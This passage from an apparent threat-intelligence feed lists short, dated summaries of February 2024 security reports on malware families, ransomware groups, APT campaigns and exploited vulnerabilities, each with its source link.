Impact:: LOW

Summary:: Cybereason has observed threat actors exploiting older YouTube accounts to host links to malware (including infostealers like Redline and Racoonstealer and other commodity malware like SmokeLoader) that masquerade as cracked versions of popular paid software.

Source: https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/

Intel Source:: Cyfirma

Intel Name:: Malware_development_competition

Date of Scan:: 2024-02-14

Impact:: LOW

Summary:: The CYFIRMA research team has observed a sharp rise in malware being distributed on a Russian hacking forum at no cost. The forum administrators had announced a malware development competition on 1st November 2023.

Source: https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/

Intel Source:: trendmicro

Intel Name:: Water_Hydra_Exploits_Zero_Day_Vulnerabilities

Date of Scan:: 2024-02-14

Impact:: LOW

Summary:: In its attacks aimed at financial market traders, the APT organization Water Hydra has been taking advantage of the Microsoft Defender SmartScreen vulnerability (CVE-2024-21412). The Trend Micro Zero Day Initiative found and made public this vulnerability, which Microsoft has now fixed.

Source: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html

Intel Source:: Malwarebytes

Intel Name:: Phishing_Attacks_Using_Remote_Monitoring_and_Management_Software

Date of Scan:: 2024-02-14

Impact:: LOW

Summary:: Researchers at Malwarebytes have investigated a specific phishing scheme using the AnyDesk remote software to target business users. IT administrators may streamline activities and ensure network integrity remotely with the use of popular products like AnyDesk, Atera, and Splashtop, which are examples of remote monitoring and management (RMM) software. Cybercriminals, however, have noticed these same tools and are using them to breach corporate networks and steal confidential information.

Source: https://www.malwarebytes.com/blog/news/2024/02/remote-monitoring-management-software-used-in-phishing-attacks

Intel Source:: ReliaQuest

Intel Name:: Emergence_of_Novel_SocGholish_Infection_Chain

Date of Scan:: 2024-02-14

Impact:: LOW

Summary:: Researchers from ReliaQuest have found suspicious JavaScript files in client environments, such as "update.js," which is a file name frequently used by malware versions pretending to be updates, such as SocGholish. Upon examining the first-stage payload's execution, they discovered a novel characteristic of this malware, the intrusion of Python for persistence.

Source: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/

Intel Source:: Malwarebytes

Intel Name:: Warzone_RAT_Cybercriminals_caught

Date of Scan:: 2024-02-13

Impact:: LOW

Summary:: The article highlights an international operation that acquired domains involved in the sale of information-stealing malware. Federal authorities in Boston took control of www.warzone.ws and three associated domains, which were selling the sophisticated Warzone RAT malware. This Remote Access Trojan (RAT) allowed cybercriminals to access victims' file systems, capture screenshots, record keystrokes, steal usernames and passwords, and even monitor victims through their web cameras, all without their awareness or consent.

Source: https://www.malwarebytes.com/blog/news/2024/02/warzone-rat-infrastructure-seized

Intel Source:: HHS GOV

Intel Name:: In_depth_examination_of_Akira_ransomware

Date of Scan:: 2024-02-13

Impact:: LOW

Summary:: In its brief existence, the Akira ransomware group has shown to be a formidable and proficient adversary to the American healthcare industry. Akira makes use of a lot of shared elements in its operations and targeting. They function as ransomware-as-a-service (RaaS), meaning they concentrate on ransomware operations while collaborating with other cybercriminals to launch targeted assaults and split the extorted money.

Source: https://www.hhs.gov/sites/default/files/akira-randsomware-analyst-note-feb2024.pdf

Intel Source:: ISC.SANS

Intel Name:: The_Mirai_Bot_Exploits_Bytevalue_Router_Vulnerability

Date of Scan:: 2024-02-13

Impact:: LOW

Summary:: Researchers at INC.SANS have examined a URL that surfaced in their "First Seen" list. At first, the sensors picked up requests for "goform/webRead/open" alone. "Goform"-containing URLs are usually connected to the RealTek SDK. The SDK is typically used by routers built around RealTek SoCs (Systems on a Chip) to implement web-based access features. There were formerly a lot of vulnerabilities in the RealTek SDK. Currently, they use a "/goform/" URL to track more than 900 distinct URLs within the honeypots.

Source: https://isc.sans.edu/diary/Exploit+against+Unnamed+Bytevalue+router+vulnerability+included+in+Mirai+Bot/30642/

Intel Source:: Proofpoint

Intel Name:: Cyberattack_Targeting_Executives_Using_Microsoft_Azure

Date of Scan:: 2024-02-13

Impact:: MEDIUM

Summary:: Proofpoint researchers have identified an active cloud account takeover campaign targeting Microsoft Azure environments. The attack, combining credential phishing and cloud account takeover tactics, has impacted various organizations globally. Threat actors utilize individualized phishing lures within shared documents, directing users to malicious webpages. Diverse roles, including senior executives, are targeted, with a specific Linux user-agent identified. Post-compromise activities involve MFA manipulation, data exfiltration, internal and external phishing, financial fraud attempts, and mailbox rule creation. The attackers' operational infrastructure includes proxies, data hosting services, and hijacked domains, posing challenges for defenders. While no specific attribution is provided, Russian and Nigerian attackers are noted as potential actors. The Proofpoint team recommends enhanced security measures, including user training, multi-factor authentication, and continuous monitoring.

Source: https://www.proofpoint.com/us/blog/cloud-security/community-alert-ongoing-malicious-campaign-impacting-azure-cloud-environments

Intel Source:: Proofpoint

Intel Name:: Bumblebee_is_Back

Date of Scan:: 2024-02-13

Impact:: LOW

Summary:: On February 8, 2024, Proofpoint researchers have discovered that the Bumblebee malware had reappeared in the cybercriminal threat landscape following a four-month hiatus. Cybercriminal threat actors employ the sophisticated downloader known as Bumblebee, which was a preferred payload during its initial release in March 2022 and continued to be used until October 2023, when it vanished.

Source: https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black

Intel Source:: Orange Cyberdefense

Intel Name:: Attackers_Exploiting_Ivanti_SSRF_Flow_to_Deploy_DSLog_Backdoor

Date of Scan:: 2024-02-13

Impact:: MEDIUM

Summary:: In order to install the new DSLog backdoor on susceptible devices, hackers are taking use of a server-side request forgery (SSRF) weakness in the ZTA, Policy Secure, and Ivanti Connect Secure gateways. On Ivanti gateways running versions 9.x and 22.x, the vulnerability affects the SAML component of the aforementioned products and enables attackers to get around authentication and access resources that are blocked.

Source: https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf

Intel Source:: Huntress

Intel Name:: MSSQL_Server_Compromise_and_Ransomware_Threat

Date of Scan:: 2024-02-13

Impact:: MEDIUM

Summary:: Huntress researchers have unveils sophisticated tactics used by attackers targeting MSSQL servers, including the use of the bulk copy command for file extraction and the deployment of scripts for unauthorized account creation and remote access tool installation.

Source: https://www.huntress.com/blog/attacking-mssql-servers

Intel Source:: Zscaler

Intel Name:: PikaBot_Appears_Again_with_Simplified_Code_and_Clever_Strategies

Date of Scan:: 2024-02-13

Impact:: LOW

Summary:: Zscaler researchers have discovered that the threat actors responsible for the PikaBot malware have undergone a "devolution" in which they have made notable modifications to the virus. The developers have removed sophisticated obfuscation techniques and altered the network interactions, which has reduced the complexity of the code even though it looks to be in a new development cycle and testing phase.

Source: https://www.zscaler.com/blogs/security-research/d-evolution-pikabot

Intel Source:: Palo Alto

Intel Name:: Glupteba_botnet_using_undocumented_UEFI_Bootkit_to_Avoid_Detection

Date of Scan:: 2024-02-13

Impact:: LOW

Summary:: It has been discovered that the Glupteba botnet using a previously unreported Unified Extensible Firmware Interface (UEFI) bootkit functionality, which gives the malware an extra degree of stealth and sophistication. By interfering with and controlling the [operating system] boot process, this bootkit allows Glupteba to conceal itself and develop a covert persistence that can be very challenging to find and eliminate.

Source: https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/#post-132484-_ydqdbjg0dngh

Intel Source:: ASEC

Intel Name:: RAT_Distribution_Leveraging_Legitimate_Tools_for_Stealth

Date of Scan:: 2024-02-13

Impact:: MEDIUM

Summary:: ASEC researchers have uncovered a complex cyberattack scheme employing legitimate software tools alongside malicious files to distribute Revenge RAT malware stealthily. Attackers cleverly execute a malicious setup.exe file under the guise of running legitimate tools such as smtp-validator and Email To Sms, making detection by users challenging. The malware establishes persistence by hiding its components and manipulating Windows registry for autorun, further downloading additional payloads from a C2 server disguised as a benign blog. This multi-stage attack involves evasion techniques, such as using the CMSTP method for bypassing antivirus detection and employing fileless execution of Revenge RAT, to perform various malicious activities including data theft.

Source: https://asec.ahnlab.com/en/61584/

Intel Source:: Habr

Intel Name:: Cyber_spies_Sticky_Werewolf_activity_in_Belarus

Date of Scan:: 2024-02-12

Impact:: LOW

Summary:: The cyberspyware APT group Sticky Werewolf probably tried to attack Belarusian companies by distributing the Ozone RAT remote access Trojan under the guise of computer cleaning and optimization software CCleaner.

Source: https://habr.com/ru/companies/f_a_c_c_t/news/792672/

Intel Source:: ISC.SANS

Intel Name:: A_malicious_PowerShell_payload_Rabby_Wallet

Date of Scan:: 2024-02-12

Impact:: LOW

Summary:: ISC.Sans researcher Xavier Mertens in his research, YARA rule triggered a new sample called "Rabby-Wallet.msix", the file has a VT score of 8/58. After his analysis, the file appears to implement the same technique to execute a malicious PowerShell payload.

Source: https://isc.sans.edu/diary/rss/30636

Intel Source:: SOCRadar

Intel Name:: A_new_Ivanti_critical_Remote_Code_Execution_vulnerability_in_FortiOS

Date of Scan:: 2024-02-12

Impact:: HIGH

Summary:: Fortinet has revealed a new critical Remote Code Execution vulnerability in FortiOS SSL VPN, cautioning about potential exploitation in ongoing attacks. Latest Ivanti Flaw Possibly Exploited (CVE-2024-21762, CVE-2023-40547, CVE-2024-22024).

Source: https://socradar.io/rces-in-fortios-ssl-vpn-shim-latest-ivanti-flaw-possibly-exploited-cve-2024-21762-cve-2023-40547-cve-2024-22024/

Intel Source:: SOCRadar

Intel Name:: LuaJIT_based_modular_backdoor_LuaDream_activity_by_Sandman_APT

Date of Scan:: 2024-02-12

Impact:: LOW

Summary:: SOCRadar wrote in their article that research provided by SentinelOne and QGroup, the Sandman APT group gained highly sophisticated and stealthy attack methods, with an accent focus on a new modular backdoor known as LuaDream, which is built on the LuaJIT platform. LuaDream's strategy is targeted to minimize detection risks and showcases a continuous development approach.

Source: https://socradar.io/dark-web-profile-sandman-apt/

Intel Source:: Hunt.io

Intel Name:: Examination_of_new_ShadowPad_infrastructure_new_threat_actor

Date of Scan:: 2024-02-12

Impact:: LOW

Summary:: This post will examine ShadowPad infrastructure linked to a yet-to-be-identified threat actor. What makes this activity different is a slight change in the HTTP response headers and the use of a certificate attempting to spoof American technology company, Dell. Within this group of IPs, there are additional subsets of activity utilizing different port configurations and some interesting domains, discussed later in this article.

Source: https://hunt.io/blog/tracking-shadowpad-infrastructure-via-non-standard-certificates

Intel Source:: Eclecticiq

Intel Name:: Increased_delivery_of_the_DarkGate_loader

Date of Scan:: 2024-02-12

Impact:: LOW

Summary:: EclecticIQ analysts observed increased delivery of the DarkGate loader which was takedown of Qakbot infrastructure last year. EclecticIQ analysts are sure that financially motivated threat actors, including groups like TA577 and Ducktail, along with Ransomware-as-a-Service (RaaS) organizations such as BianLian and Black Basta, primarily use DarkGate. These threat actors target financial institutions in Europe and the USA, focusing mainly on double extortion tactics

Source: https://blog.eclecticiq.com/darkgate-opening-gates-for-financially-motivated-threat-actors

Intel Source:: Crowdstrike

Intel Name:: The_HijackLoader_Expands_Its_Evasion_Techniques

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: Researchers at CrowdStrike have discovered that, as other threat actors use the loader malware known as HijackLoader more frequently to deliver more payloads and tooling, the threat actors behind it have developed new security evasion strategies.

Source: https://www.crowdstrike.com/blog/hijackloader-expands-techniques/

Intel Source:: Bitdefender

Intel Name:: A_New_Rust_Written_MacOS_Backdoor_Ties_to_Windows_Ransomware

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: Researchers at Bitdefender have uncovered a brand-new backdoor that targets Mac OS users. This family of malware, which had not been previously described, is written in Rust and has a number of intriguing properties. All detected files are distributed directly as FAT binaries with Mach-O files for both x86_64 Intel and ARM architectures, and the backdoor appears to be posing as a Visual Studio update.

Source: https://www.bitdefender.com/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group/

Intel Source:: Checkpoint

Intel Name:: The_malicious_use_of_maldocs

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: The article discusses the use of maldocs, or malicious documents, in spreading malware. It introduces the concept of maldocs and provides examples of different types of malware. The article also focuses on old and well-known CVEs used in Microsoft Word and Excel, and their continued threat to the cyber community. It discusses the techniques used by maldoc operators to evade detection and the challenges faced by researchers in analyzing them. The article concludes by emphasizing the need for different methods to deal with maldocs and providing resources for further reading.

Source: https://research.checkpoint.com/2024/maldocs-of-word-and-excel-vigor-of-the-ages/

Intel Source:: ArcticWolf

Intel Name:: Exploitation_of_Confluence_Server_Vulnerability_CVE_2023_22527

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: Researchers from Arctic Wolf have seen proof of the C3RB3R ransomware and a number of other malicious payloads being used after the CVE-2023-22527 vulnerability was exploited. CVE-2023-22527 is being used by a number of threat actors to distribute payloads for trojans that gain remote access and mine cryptocurrencies.

Source: https://arcticwolf.com/resources/blog-uk/exploitation-of-confluence-server-vulnerability-cve-2023-22527-leading-to-c3rb3r-ransomware/

Intel Source:: Esentire

Intel Name:: SolarMarker_infections

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: The article discusses the increasing prevalence of SolarMarker infections and the evolving tactics of the threat actor behind it. The eSentire Threat Response Unit (TRU) has been tracking SolarMarker since 2021 and has observed a significant increase in infections since November 2023. The threat actor has been using Inno Setup and PS2EXE tools to generate payloads, with recent payloads being modified using string replacements. The article also includes details on the PowerShell script used by SolarMarker, the loading of second-stage payloads, and the addition of junk instructions and byte arrays to evade detection. The TRU team recommends implementing controls such as Endpoint Detection and Response (EDR) solutions and security awareness training to protect against SolarMarker. The article also provides indicators of compromise and decrypted payloads for reference.

Source: https://www.esentire.com/blog/the-oncoming-wave-of-solarmarker

Intel Source:: Esentire

Intel Name:: The_injection_of_RemcosRAT_into_the_winhlp32_exe_file_process

Date of Scan:: 2024-02-09

Impact:: MEDIUM

Summary:: The article discusses a recent threat investigation conducted by eSentire's Threat Response Unit (TRU). The investigation involved a suspicious ZIP archive containing an AnyDesk executable and a VBS file, delivered via a Discord CDN link. Further investigation revealed that the VBS file executed another VBS file hosted on paste[.]ee, which contained the DcRat malware. The DcRat malware had encrypted configuration and supported dynamic loading and execution of plugins. The final payload retrieved via the plugin was a VBS file containing the RemcosRAT malware and dynwrapx.dll. The RemcosRAT malware was injected into the winhlp32.exe process and allowed for remote control of the infected machine. The TRU team isolated the system and provided recommendations for protection against similar threats, such as user training and using Next-Gen AV or Endpoint Detection and Response tools. The section also includes indicators of compromise and references for further information.

Source: https://www.esentire.com/blog/from-onlydcratfans-to-remcosrat

Intel Source:: Fortinet

Intel Name:: Attacks_on_Critical_Infrastructure_Exploiting_FortiOS_Vulnerabilities

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: Researchers from Fortinet alerted companies on Wednesday that attacks targeting vital infrastructure and other sectors have been made possible by APTs associated with China and other nations, which have been taking use of two known FortiOS vulnerabilities.

Source: https://www.fortinet.com/blog/psirt-blogs/importance-of-patching-an-analysis-of-the-exploitation-of-n-day-vulnerabilities

Intel Source:: Cisco Talos

Intel Name:: New_Zardoor_backdoor_used_in_the_cyber_espionage_operation

Date of Scan:: 2024-02-09

Impact:: LOW

Summary:: The article discusses a new cyber espionage campaign, known as Zardoor, targeting an Islamic non-profit organization. The campaign uses a previously unreported malware family and advanced techniques to maintain access to the victim's network without detection. The article provides details on the execution flow of the Zardoor backdoor and how the threat actor maintains persistence using a dropper and malicious DLL files. It also describes the use of reverse proxy tools to bypass network security measures and provides information on how to detect and block this threat. The article concludes with a list of MITRE ATT&CK techniques used by the threat actor and a list of IOCs for further investigation.

Source: https://blog.talosintelligence.com/new-zardoor-backdoor/

Intel Source:: Lumen

Intel Name:: Its_Not_A_Comeback_of_KV_Botnet

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: According to Black Lotus Labs, since users are unlikely to notice an impact or possess the required monitoring forensic tools to detect an infection, KV-botnet attackers will likely continue to use medium- to high-bandwidth devices as a springboard in the geographic areas of their targets. Additionally, the Federal Bureau of Investigation (FBI) carried out a court-authorized takedown of the KV-botnet in early December 2023, according to a press release from the Department of Justice (DOJ).

Source: https://blog.lumen.com/kv-botnet-dont-call-it-a-comeback/?utm_source=rss&utm_medium=rss&utm_campaign=kv-botnet-dont-call-it-a-comeback

Intel Source:: Citizenlab

Intel Name:: The_PAPERWALL_malicious_campaign

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: The article discusses the PAPERWALL network, a large and fast-growing network of Chinese websites posing as local news outlets. It provides information on the number of websites targeting various countries and the high-confidence host IP addresses. The article also discusses the attribution of PAPERWALL to a Chinese PR firm and the evidence linking it to the websites. It also mentions the use of hypestat.com to measure website traffic and the negligible traffic for most PAPERWALL domains. The article highlights the network's tactics, including the use of commercial press releases to disseminate pro-Beijing disinformation and ad hominem attacks. It also discusses the potential impact of these influence operations and the role of private firms in managing them. The article provides a breakdown of the types of content published on the PAPERWALL websites, including conspiracy theories, Chinese state media reposts, and scraping of local mainstream media. It also discusses the infrastructure and hosting of these websites, as well as the small number of content author names used. The article concludes by listing the confirmed domains and targeted countries, as well as acknowledging the research support and peer review from various individuals and organizations.

Source: https://citizenlab.ca/2024/02/paperwall-chinese-websites-posing-as-local-news-outlets-with-pro-beijing-content/

Intel Source:: Securelist

Intel Name:: Abuse_of_Squirrel_Installation_by_Multi_Stage_Banking_Trojan

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: Securelist researchers have discovered a new malware that is targeting consumers of over 60 banking institutions, primarily in Brazil. Using a variety of cutting-edge technologies, it differs from well-known banking Trojan attacks.

Source: https://securelist.com/coyote-multi-stage-banking-trojan/111846/

Intel Source:: Checkpoint

Intel Name:: The_Raspberry_Robin_worm

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: The article discusses the latest version of the malware Raspberry Robin and its evasion techniques, including NtTraceEvent hooking and new evasion tricks. It also explains the changes in the malware's lateral movement logic and communication method. The article provides a comparison between the previous and current versions of the malware and describes its persistence method. It also discusses the ongoing threat of Raspberry Robin and how Check Point customers remain protected against it. The article includes a detailed analysis of the first stage of the malware and its use of APIs. It also provides a list of IOCs and onion domains associated with the malware.

Source: https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/

Intel Source:: Cyble

Intel Name:: The_analysis_of_a_new_Clipper_dubbed_XPhase

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: The article discusses a new malware campaign, known as the "Doppelganger Dilemma," which targets cryptocurrency users through deceptive websites and mimicking legitimate crypto applications. The campaign primarily targets Indian users but also has phishing sites tailored to Russian users. The malware, named "XPhase Clipper," intercepts and modifies cryptocurrency wallet addresses copied by users. The campaign is linked to a previous phishing campaign and is believed to be carried out by the same threat actor. The article also highlights the use of a deceptive YouTube channel and provides technical analysis of the campaign. The abstract introduces the concept of adaptability and resourcefulness in sustaining cyber attacks, and the article concludes with recommendations for cybersecurity best practices and indicators of compromise for detecting the XPhase Clipper malware.

Source: https://cyble.com/blog/doppelganger-dilemma-new-xphase-clippers-proliferation-via-deceptive-crypto-sites-and-cloned-youtube-videos/

Intel Source:: ISC.SANS

Intel Name:: A_Malicious_Python_Scripts_Targeting_Windows_Users

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: Researchers at ISC.SANS have identified a threat where malicious Python scripts are employed by threat actors to target Windows users, incorporating a keylogger. The recorded keystrokes are transmitted to a basic TCP connection established with the command and control server (C2), lacking any form of encryption, essentially sending raw keycodes.

Source: https://isc.sans.edu/diary/rss/30632

Intel Source:: ASEC

Intel Name:: BlueShell_Targeting_Linux_Systems_in_Korean_Attacks

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: ASEC researchers have identified ongoing attacks on Korean Linux systems, where the BlueShell backdoor malware, upon installation, grants the threat actor full control over the compromised system.

Source: https://asec.ahnlab.com/en/61549/

Intel Source:: Avast

Intel Name:: Avast_Q4_2023_Threat_Report

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: The Avast Q4/2023 Threat Report provides a comprehensive overview of the cyber threat landscape in the fourth quarter of 2023. It covers both desktop and mobile threats, highlighting the significant increase in blocked attacks and the resurgence of Qakbot. The report also discusses the use of Google OAuth API for malicious activities and the rise of malicious coinmining. It also covers the evolving mobile threat landscape, including the resurgence of the Chameleon banker and the spread of SpyLoans on the PlayStore. The report concludes with predictions for 2024 and emphasizes Avast's commitment to ensuring the safety of its users. The methodology used in the report is also explained, including the calculation of the "risk ratio" to measure the severity of specific threats. The report also discusses the prevalence and impact of RATs, rootkits, and web-based threats on mobile devices. It also covers the growing trend of mobile scams and the use of cell phones for online presence management. The report also highlights the dangers of adware and the need for dynamic and adaptive measures to counter it. It also discusses the prevalence of financial and dating scams, as well as the increase in fake online shops and phishing scams targeting post-holiday online shoppers. The report also mentions the use of standard tools and vulnerabilities by rootkits and APT groups, as well as Avast's efforts to address scam push notifications. It also discusses the distribution of malicious mods for popular messaging apps and the risk ratio for mobile spyware. The report also provides insights into the prevalence and impact of bots and coinminers, with a focus on specific threats and countries. Overall, the report highlights the constantly evolving and sophisticated nature of cyber threats and the need for increased cybersecurity measures to protect against them.

Source: https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/

Intel Source:: S2W Blog

Intel Name:: The_Golang_Stealer_Troll_and_GoBear_Backdoor

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: S2W threat researchers have discovered a new malware sample associated with the Kimsuky group, named Troll Stealer. It is distributed through a Dropper disguised as SGA Solutions' Trusted PKI installer. Troll Stealer is capable of Stealing the GPKI folder on infected systems, indicating a potential focus on devices within administrative and public organizations in South Korea. Furthermore, the identification of additional malware signed with the same legitimate certificate raises the possibility of future distributions using that certificate.

Source: https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2

Intel Source:: Malwarebytes

Intel Name:: A_malvertising_campaign_on_Facebook_still_on

Date of Scan:: 2024-02-08

Impact:: LOW

Summary:: The article discusses a Facebook scam that has been ongoing for almost a year and is now appearing in different languages. The scam involves fake posts about fatal accidents and prompts users to click on a link, leading to malicious websites. The scammers use different tactics to target users based on their location and device. Tips on how to protect oneself from falling victim to this scam are provided, such as checking for unknown apps and enabling two-factor authentication. Malwarebytes' efforts to block these malicious websites are also mentioned, along with their Identity Theft Protection service as a way to safeguard personal information.

Source: https://www.malwarebytes.com/blog/news/2024/02/facebook-fatal-accident-scam-still-rages-on

Intel Source:: Splunk

Intel Name:: Jenkins_CVE_2024_23897_RCE

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: This article discusses the recent discovery of a critical security vulnerability in Jenkins servers, which are commonly used for continuous integration and deployment in software development. The vulnerability, known as CVE-2024-23897, allows attackers to read files from the server's file system without authentication. The Splunk Threat Research Team has developed security analytics and hunting queries to help defenders protect against this exploit. The article provides an overview of the exploit and how it works, as well as a sample query for detecting it in Jenkins logs. It also discusses the use of a reverse proxy and logging Jenkins logs in Splunk for enhanced security. The author, Michael Haag, is also mentioned, along with references for further information.

Source: https://www.splunk.com/en_us/blog/security/security-insights-jenkins-cve-2024-23897-rce.html

Intel Source:: CISA

Intel Name:: The_compromise_of_the_IT_environments_of_multiple_critical_infrastructures_by_Volt_Typhoon

Date of Scan:: 2024-02-07

Impact:: HIGH

Summary:: The CISA, NSA, and FBI released a joint Cybersecurity Advisory about People’s Republic of China (PRC) state-sponsored cyber actors who are trying to disrupts on IT networks with cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States. It was based on observations from the U.S. authoring agencies’ incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus). The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations—primarily in Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors—in the continental and non-continental United States and its territories, including Guam.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories?f%5B0%5D=advisory_type%3A65&f%5B1%5D=advisory_type%3A93&f%5B2%5D=advisory_type%3A94 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a https://www.cisa.gov/news-events/analysis-reports/ar24-038a

Intel Source:: F1tym1

Intel Name:: The_distribution_of_Qshing_Emails

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: The article discusses the distribution of Qshing emails, which are disguised as payslips and lead to malicious apps or phishing sites when a QR code is scanned. The sender email address is forged to appear legitimate, but the actual address can be seen in the email header. Scanning the QR code redirects users to a phishing site that prompts for personal information and can result in financial losses. The article provides IOC information and encourages users to subscribe to AhnLab's threat intelligence platform for more information.

Source: https://f1tym1.com/2024/02/02/distribution-of-qshing-emails-disguised-as-payslips/

Intel Source:: ASEC

Intel Name:: The_Distribution_of_Zephyr_CoinMiner

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: The ASEC BLOG has discovered a CoinMiner targeting Zephyr cryptocurrency, distributed through a compressed file named "WINDOWS_PY_M3U_EXPLOIT_2024.7z." The file creates scripts and executables, including an NSIS installer and two Javascript files, executed via wscript.exe. The executable "x.exe" contains a compressed file and a legitimate "7za.exe" file, which, when decompressed with a specific password, creates two more Autoit script files acting as a CoinMiner. Users are advised to be cautious when downloading files from unknown sources and to update their anti-malware solutions. The malware is detected by V3 and IOC information is provided for further investigation.

Source: https://asec.ahnlab.com/en/61164/

Intel Source:: Vice

Intel Name:: The_fake_version_of_WhatsApp_linked_to_a_spyware

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: Researchers have discovered a fake version of WhatsApp created by a spyware vendor, Cy4Gate, to gather information from iPhone users. The fake app was designed to trick users into installing a configuration file that could potentially collect data from their device. The company has a history of developing surveillance products and the fake WhatsApp page shared an encryption certificate with other domains associated with Cy4Gate. Although the company denied involvement, the researchers believe it is likely their product. The article also discusses Cy4Gate's Epeius product, which is designed for targeted surveillance and data collection.

Source: https://www.vice.com/en/article/akdqwa/a-spyware-vendor-seemingly-made-a-fake-whatsapp-to-hack-targets

Intel Source:: ASEC

Intel Name:: Analysis_of_phishing_campaign_disguised_as_a_famous_Korean_portal_login_page

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: The article discusses a recent phishing case where a fake login page was disguised as a popular Korean portal website. The threat actor collected login credentials and client information through the phishing page and used a legitimate plugin-type service to obtain more data. The article provides IOC information and advises caution when using login pages linked to emails from unknown sources.

Source: https://asec.ahnlab.com/en/61130/

Intel Source:: Infoblox

Intel Name:: Lazarus_KandyKorn_malicious_DNS

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: The article discusses the importance of early detection of malicious domains in preventing cyber attacks. It introduces Infoblox's DNS Early Detection Program, which uses proprietary techniques to identify potentially malicious domains and compares its analysis with data from public open source intelligence and commercial threat intelligence feeds. The program's findings and role in identifying suspicious domains are highlighted, along with an analysis of a phishing campaign by CSIRT KNF. The methodology used in the analysis and the advantages of using Infoblox's suspicious domain data are also discussed. The article is written by a senior product marketing manager at Infoblox with experience in cybersecurity.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-for-early-detection-global-postal-services-phishing-campaign/

Intel Source:: Rapid7

Intel Name:: A_Comprehensive_Analysis_of_Black_Hunt_Ransomware

Date of Scan:: 2024-02-07

Impact:: LOW

Summary:: The article provides a comprehensive analysis of the Black Hunt ransomware, a new variant that was first reported in 2022. The article discusses the ransomware's features and capabilities, including its ability to encrypt various file extensions and evade detection by checking for debugging and targeting specific countries. It also explores the ransomware's code and functionality, including its encryption process, spreading mechanisms, and use of MITRE ATT&CK techniques. The article also provides an overview of the ransomware's malicious activities, such as modifying the Windows registry, disabling security measures, and inhibiting system recovery. It concludes with a list of indicators of compromise and a technical analysis of the ransomware's code.

Source: https://www.rapid7.com/blog/post/2024/02/05/exploring-the-not-so-secret-code-of-blackhunt-ransomware-2/

Intel Source:: CSIRT-CTI

Intel Name:: Stately_Taurus_Cyber_Espionage_in_Myanmar

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: Between November 2023 and January 2024, cybersecurity teams uncovered a series of cyber attacks by Stately Taurus targeting Myanmar's military entities. The campaigns involved sophisticated malware delivery through phishing, using tactics like DLL hijacking and Cobalt Strike beacons. These efforts aimed at espionage against the Myanmar military, leveraging political tensions as bait for their attacks. The operation’s complexity and targeted nature highlight the ongoing cyber threats from state-sponsored actors in the region.

Source: https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/

Intel Source:: ISC.SANS

Intel Name:: The_Public_Information_and_Spam_Email

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: Multiple organizations make their contact details available to the public so that people can ask for assistance when they need it. This could be a list of all staff members' public contacts or just general information. It should go without saying that having any information that is accessible to the public will make these accounts more vulnerable to spam or phishing emails.

Source: https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620

Intel Source:: QiAnXin X Laboratory

Intel Name:: C2_Hosting_Using_EtherHiding_by_SmartGaft

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: Researchers from XLab have obtained Smargaft bot samples for two different versions of each of the three CPU architectures: ARM, MIPS, and X86/64. The ability of these versions to spread like worms is the main distinction between them. In general, Smargaft functions quite simply. It verifies the current user when it runs on a compromised device; if it's root, it starts more scanning and propagation tasks. After that, it manipulates the watchdog to stop the device from restarting and binds to a local port to guarantee that only one instance is running at a time. It then initiates five actions, including as using smart contracts to obtain C2, launching DDoS attakcs, and making sure it stays on the device. Lastly, Smargaft cycles through these duties at predetermined intervals while operating in an endless loop.

Source: https://blog.xlab.qianxin.com/smargaft_abusing_binance-smart-contracts_en/

Intel Source:: Cybereason

Intel Name:: The_Second_Round_of_Ivanti_Connect_Secure_VPN_ZeroDay_Exploitation

Date of Scan:: 2024-02-06

Impact:: HIGH

